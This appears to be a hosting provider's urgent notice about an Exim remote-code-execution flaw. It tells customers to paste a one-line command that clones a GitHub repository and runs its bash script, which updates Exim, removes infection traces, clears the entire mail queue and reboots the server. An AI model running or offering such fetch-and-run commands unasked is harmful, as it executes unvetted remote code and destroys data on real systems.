Exim Vulnerability

Learn what's accepted on our network

CRITICAL: Your attention and action is required to avoid being hacked

Attention to all VPS and dedicated server customers! A critical vulnerability has been detected that affects all customers who use VestaCP, cPanel, ISP and who set up a web server.

To avoid being hacked, carry out the following instructions carefully on your VPS or server.

If you do not know how to do it, tell us that you need help, but it’s crucial that it gets done.

If you are using CentOS as your operating system:

yum install git && git clone https://github.com/Abelohost/exim-rce-quickfix.git && cd exim-rce-quickfix && bash exim_rce_fixer.sh

If you are using Debian or Ubuntu as your operating system:

apt install git && git clone https://github.com/Abelohost/exim-rce-quickfix.git && cd exim-rce-quickfix && bash exim_rce_fixer.sh

What the script does for you:

1. If the operating system is installed on the server:

  • Centos 7 updates Exim, reinstalls curl.
  • Centos 6 updates Exim from the EPEL test repository (release to regular repositories is expected 11-12.06), reinstalls curl.

2. Checks for the infection on the server.

2a. If there is no infection, the script completes its function.

2b. If there are traces of a viral script in the /etc folder, it does the following:

  • stops cron;
  • ceases the process initiated by the virus script;
  • stops the curl wget sh process 3 times (run by the virus on a schedule);
  • Clears the mail queue from all emails (it’s difficult to differentiate infected emails from harmless, thus all need the entire queue needs to be removed);
  • allows the deletion of files where malware is detected;
  • deletes these malware files;
  • removes the autostart task in /etc/rc.local
  • removes the attacker’s keys from the SSH keys;
  • runs cron;
  • then immediately reboots the server.

Please open a ticket if you have any questions. We will remove the infection for free.